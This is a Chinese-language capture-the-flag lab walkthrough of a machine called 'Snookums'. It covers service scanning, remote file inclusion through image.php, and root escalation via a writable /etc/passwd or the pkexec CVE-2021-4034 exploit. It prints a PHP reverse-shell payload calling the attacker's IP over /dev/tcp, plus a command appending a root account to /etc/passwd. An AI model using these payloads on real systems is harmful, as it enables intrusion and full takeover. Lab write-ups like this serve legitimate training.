Snookums

简介

point 20

Snookums

Difficulty INTERMEDIATE

rated by community INTERMEDIATE

 

实验环境

攻击者 Kali 192.168.45.206

受害者 IP 192.168.241.58  Linux

 

1. 信息收集

收集受害者服务详情

nmap -sV -A 192.168.241.58

21/tcp open ftp vsftpd 3.0.2

22/tcp open ssh OpenSSH 7.4 (protocol 2.0)

80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)

139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open mysql MySQL (unauthorized)

 

先尝试smbclient查看共享

smbclient -L ///192.168.241.58//

Password for [WORKGROUP\root]:

要密码 不行

 

FUZZ测试也没用

 

2. 漏洞发掘与利用

2024-04-11_23-48

google一下 

发现一个RFI漏洞

https://www.exploit-db.com/exploits/48424

 

我们可以先实验一下

2024-04-11_23-49

LFI可以

 

现在尝试RFI

先准备一个php木马

<?php echo system("bash -c 'bash -i >& /dev/tcp/192.168.45.206/445 0>&1'");?>

python使用80端口的服务器 否则受害者无法包含

 

Kali监听445

 

URL:http://192.168.241.58/image.php?img=http://192.168.45.206/shell.php

 

输入后就拿到了反弹shell

 

3. 权限提升

3.1 第一种解法

在/var/www/html中发现db.php

里面有数据库名和密码

登录数据库 找到用户名和密码

2024-04-11_23-58

而且家目录里面有michael的目录

所以 base64解码michael

HockSydneyCertify123

登录

 

linpeas里面有很重要的黄色词条

2024-04-12_00-07

 

重点

在攻击者上生成密码

openssl passwd -1 -salt password zhyann

生成密码为zhyann的加盐密码

echo 'zhyann:$1$password$WgTlColyEK2vchzTwRvQk.:0:0:root:/root:/bin/bash' >> /etc/passwd

用zhyann:zhyann就能得到root权限

2024-04-12_00-10

 

 

3.2 第二种解法

这种方法是在google上看到的

但是发现我的linpeas无法看出来 但是别人的可以

1_33FHXma_SBe4rubQ_cIabw

sudo version 版本为1.8.23的直接可以进去

https://github.com/joeammond/CVE-2021-4034

 

直接就能拿到root权限

2024-04-11_23-54

 

 

© 版权声明
THE END
喜欢就支持一下吧
点赞10 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片